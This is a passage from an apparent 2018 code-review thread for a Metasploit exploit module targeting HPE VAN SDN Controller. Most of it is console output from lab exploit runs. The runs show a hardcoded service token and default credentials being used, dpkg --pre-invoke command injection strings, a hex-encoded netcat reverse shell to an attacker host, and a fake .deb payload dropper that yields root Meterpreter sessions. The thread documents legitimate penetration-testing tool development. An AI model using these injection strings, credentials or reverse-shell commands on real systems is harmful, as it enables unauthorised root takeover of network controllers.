drwxrwx--- 8 sdn  sdn  4096 Sep 11  2016 ..
drwxr-xr-x 2 root root 4096 Jul  2 16:07 tmp

./tmp:
total 8
drwxr-xr-x 2 root root 4096 Jul  2 16:07 .
drwxrwx--- 3 sdn  sdn  4096 Jul  2 16:07 ..
-rw-r--r-- 1 root root    0 Jul  2 16:07 test
root@medium-hLinux:/var/lib/sdn/uploads# ls -laR
.:
total 16
drwxrwx--- 3 sdn      sdn  4096 Jul  2 16:08 .
drwxrwx--- 8 sdn      sdn  4096 Sep 11  2016 ..
-rw-rw---- 1 sdnadmin sdn   339 Jul  2 16:08 UY0GYifofjIFK1xoK5kuZE3VYKhG.zip
drwxr-xr-x 2 root     root 4096 Jul  2 16:07 tmp

./tmp:
total 8
drwxr-xr-x 2 root root 4096 Jul  2 16:07 .
drwxrwx--- 3 sdn  sdn  4096 Jul  2 16:08 ..
-rw-r--r-- 1 root root    0 Jul  2 16:07 test
root@medium-hLinux:/var/lib/sdn/uploads#
```

2018-07-03 00:31 UTC, bcoles commented
I removed the files in `/var/lib/sdn/uploads/tmp/` generated from previous runs of the Kore exploit.

Latest module from this branch works as described:

```
msf5 exploit(linux/http/hp_van_sdn_token) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] Uploading payload ZIP
[+] Uploaded /var/lib/sdn/uploads/UsVJpZNRjCYq0o1xz2NvBz8Ko.zip
[*] Waiting for payload to be unzipped...
[*] Executing payload
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo chmod +x /var/lib/sdn/uploads/tmp/UVqcmg9sIwtC5QmPyLUWXHA7sS5TSaMcO41k4ZHhPI
[*] Executing ../../../../../usr/bin/sudo -u sdn sudo /var/lib/sdn/uploads/tmp/UVqcmg9sIwtC5QmPyLUWXHA7sS5TSaMcO41k4ZHhPI
[*] Sending stage (861480 bytes) to 10.1.1.177
[+] Deleted /var/lib/sdn/uploads/tmp/UVqcmg9sIwtC5QmPyLUWXHA7sS5TSaMcO41k4ZHhPI
[+] Deleted /var/lib/sdn/uploads/UsVJpZNRjCYq0o1xz2NvBz8Ko.zip

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.1.1.177
OS           : Debian 8 (Linux 4.4.26-1-amd64-hpelinux)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

2018-07-03 15:27 UTC, wvu-r7 commented
I'm going to pursue the uninstall action command injection so we can skip the temp dir altogether. I'd like this module to be compatible with Kore's exploit.

2018-07-03 15:31 UTC, wvu-r7 commented
I'll also add support for specifying creds or a different service token. Options are good. :+1:

2018-07-04 00:16 UTC, wvu-r7 commented
I've refactored the code to use the new command injection and have added a basic module doc. This is ready to test again.

2018-07-04 02:45 UTC, bcoles commented
Works as described, for targets 0 and 1, with and without a token set (using default creds).

2018-07-04 02:45 UTC, bcoles approved these changes

2018-07-04 02:48 UTC, bcoles commented
Thanks to your additional research, the module file name and metadata are now lies:

```
     Name: HP VAN SDN Controller Hardcoded Service Token RCE
     Module: exploit/linux/http/hp_van_sdn_token
```

Consider something like: `HP VAN SDN Controller REST uninstall Command Injection`

The file name should match the module name.

2018-07-04 02:51 UTC, bcoles commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    print_good("Logged in with auth token #{@auth_token}")
This only gets printed when logging in with credentials, which is a little confusing.

Perhaps it would make more sense to say `Retrieved auth token #{@auth_token}`

2018-07-05 17:57 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    print_good("Logged in with auth token #{@auth_token}")
Yeah, the wording is a bit funny. I had been thinking since the service token *is* the auth token, logging in with credentials would be logging in with a computed auth token instead. I agree it's confusing, so I'm changing it!

2018-07-05 18:21 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_token.rb
> +    print_good("Logged in with auth token #{@auth_token}")
Hey, I'm gonna go ahead and remove the redirect check and just do a dumb check for `X-Auth-Token`. It's more direct that way, heh.

2018-07-05 18:40 UTC, wvu-r7 commented
I expect that with the options we added to specify service token and creds, this "vulnerability" will live for a long time in this product. I've renamed the module thusly, keeping it under 80 columns as well (because I'm antiquated like that).

2018-07-05 18:46 UTC, wvu-r7 commented
Final test (negative creds check included):

```
msf5 > use exploit/linux/http/hp_van_sdn_cmd_inject
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set rhosts 192.168.56.102
rhosts => 192.168.56.102
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > check

[*] Authenticating with service token AuroraSdnToken37
[*] 192.168.56.102:8081 The target appears to be vulnerable.
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set payload cmd/unix/reverse_netcat_gaping
payload => cmd/unix/reverse_netcat_gaping
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with service token AuroraSdnToken37
[*] Executing command payload
[*] Injecting dpkg -r --pre-invoke=/bin/echo${IFS}-ne${IFS}'\x6e\x63\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x36\x2e\x31\x20\x34\x34\x34\x34\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20'|sh
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.102:53906) at 2018-07-05 13:41:00 -0500

^C
Abort session 1? [y/N]  y

[*] 192.168.56.102 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set target Linux Dropper
target => Linux Dropper
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with service token AuroraSdnToken37
[*] Uploading payload as fake .deb
[+] Uploaded /var/lib/sdn/uploads/neAnFrgeIRBovouDz4b.deb
[*] Renaming payload and executing it
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/neAnFrgeIRBovouDz4b.deb${IFS}/var/lib/sdn/uploads/neAnFrgeIRBovouDz4b${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/neAnFrgeIRBovouDz4b
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/neAnFrgeIRBovouDz4b
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:53908) at 2018-07-05 13:41:23 -0500
[+] Deleted /var/lib/sdn/uploads/neAnFrgeIRBovouDz4b

meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.56.102 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set token ""
token =>
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > check

[*] Authenticating with creds sdn:skyline
[+] Retrieved auth token 43f0bc959dac448c8489bedb9cee9fc6
[*] 192.168.56.102:8081 The target appears to be vulnerable.
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set target Unix In-Memory
target => Unix In-Memory
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set payload cmd/unix/reverse_netcat_gaping
payload => cmd/unix/reverse_netcat_gaping
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with creds sdn:skyline
[+] Retrieved auth token c0423fa502374789971b479ca169e142
[*] Executing command payload
[*] Injecting dpkg -r --pre-invoke=/bin/echo${IFS}-ne${IFS}'\x6e\x63\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x36\x2e\x31\x20\x34\x34\x34\x34\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20'|sh
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.102:53912) at 2018-07-05 13:41:53 -0500

^C
Abort session 3? [y/N]  y

[*] 192.168.56.102 - Command shell session 3 closed.  Reason: User exit
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set target Linux Dropper
target => Linux Dropper
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with creds sdn:skyline
[+] Retrieved auth token d2f46dde665046b985b410d4e26ed5fe
[*] Uploading payload as fake .deb
[+] Uploaded /var/lib/sdn/uploads/Y1CSmpNb5JsCGO8Yk9IKT.deb
[*] Renaming payload and executing it
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/Y1CSmpNb5JsCGO8Yk9IKT.deb${IFS}/var/lib/sdn/uploads/Y1CSmpNb5JsCGO8Yk9IKT${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/Y1CSmpNb5JsCGO8Yk9IKT
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/Y1CSmpNb5JsCGO8Yk9IKT
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.102:53914) at 2018-07-05 13:42:03 -0500
[+] Deleted /var/lib/sdn/uploads/Y1CSmpNb5JsCGO8Yk9IKT

meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.56.102 - Meterpreter session 4 closed.  Reason: User exit
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set password skylined
password => skylined
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > check

[*] Authenticating with creds sdn:skylined
[-] Invalid username and/or password specified
[*] 192.168.56.102:8081 The target is not exploitable.
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) >
```

2018-07-05 19:22 UTC, merged

2018-07-17 21:25 UTC, tdoan-r7 commented
#Release Notes

The exploits/linux/http/hp_van_sdn_cmd_inject module has been added to the framework. It exploits a hardcoded service token or default credentials in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.

2018-12-13 17:31 UTC, jhart-r7 commented on modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb
> +      'rport'     => 8443,
should this be `rport`?  or is there always going to be a service on this other port?

2018-12-13 17:42 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb
> +      'rport'     => 8443,
It's a separate service on the appliance used to obtain an auth token by logging in. It could perhaps be configurable like `RPORT`. Did you run into an edge case?

2018-12-13 18:07 UTC, wvu-r7 commented on modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb
> +      'rport'     => 8443,
Resolved in #11119.

2021-10-19 21:13 UTC, wvu-r7 commented
Why doesn't this module use `CmdStager`?